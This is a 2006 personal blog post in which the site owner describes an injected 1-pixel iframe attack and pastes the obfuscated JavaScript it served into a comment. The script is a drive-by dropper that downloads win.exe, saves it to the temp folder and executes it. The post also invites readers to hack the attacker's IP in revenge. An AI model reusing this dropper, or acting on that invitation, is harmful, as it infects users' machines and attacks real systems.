GregHowley.com

Hack Attempt

July 18, 2006 - -

You may have noticed the long string of php errors at the top of my site this morning. Turns out some jerk just inserted a 1-pixel iframe with a link to ip address 81.95.146.98, which holds an obfuscated script. From what I can tell, it's saving Environment(), to disk, whatever that is. Stealing some info.

I'd never have noticed if not for the fact that the iframe was inserted in front of my page headers, creating that php error. Anyway, if anyone knows how to invade that IP address and get revenge, feel free.

Jerks also left an invalid character after my footer which invalidated my xhtml. Bastards.

UPDATE: Just got an email from Carl of BostonGeek who tells me that the code set off his antivirus software. I'm gonna post that code in the comments if you feel like taking a look.

Comments on Hack Attempt
 
Comment Tue, July 18 - 12:29 PM by Greg

function f(b, a, c) { return a + b + c; }
function g(b, a) { return a + b; }
var s = new Array
(
"",
"win.exe",
"http://81.95.146.98/",
"object",
"classid",
f("0C0", g(f(g("3-11D0-9", "56-65A"), "id:BD96C5", "83A-0"), "cls"), g("9E36", "4FC2")),
g(f("ft.XMLH", "oso", "TTP"), "Micr"),
f("E", "G", "T"),
f(g(".Str", "odb"), "Ad", "eam"),
f(g(".She", "ipt"), "WScr", "ll"),
"PROCESS",
"TMP",
"/[^/]*$",
"/",
"\\"
);
a = document.createElement(s[3]);
a.setAttribute(s[4], s[5]);
with(a.CreateObject(s[6], s[0]))
{
open(s[7], location.href.replace(new RegExp(s[12]), s[13] + s[1]), false);
send();
if(status < 400)
with(a.CreateObject(s[8], s[0]))
{
Type = 1;
Open();
Write(responseBody);
with(a.CreateObject(s[9], s[0]))
{
c = Environment(s[10])(s[11]) + s[14] + s[1];
SaveToFile(c, 2);
Exec(c);
}
}
}
location.replace(s[2]);
 
Comment Thu, July 20 - 6:38 PM by /gLeNn/>.*
I'm highly jealous of your mysterious computer terms. Seriously though, that sneaky 1-pixel-iframe-inserters' got a lot of nerve invalidating your xhtml. If i ever see that good for nothing, ip address-linking bum on the street, I'll php error him in the face! And then I'll obfuscate his script!